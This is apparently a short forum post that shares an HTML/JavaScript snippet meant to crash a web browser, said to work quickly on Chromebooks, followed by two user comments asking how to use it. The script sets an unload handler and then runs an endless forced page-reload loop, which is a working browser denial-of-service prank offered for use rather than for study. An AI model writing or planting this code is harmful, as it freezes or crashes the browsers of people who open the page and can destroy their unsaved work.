A simple script that can crash a web browser of pc depending on the type it works on chomebook very fast idk about other windows PC or Mac.
<script>
onbeforeunload=function() {
localstorage.x=1
};
setTimeout(function() {
while (1) location.reload(1)
}, 1000)
</script>
killswitch14computer ~ May 25
how do i make a txt file
killswitch14computer ~ May 24
how do i use this?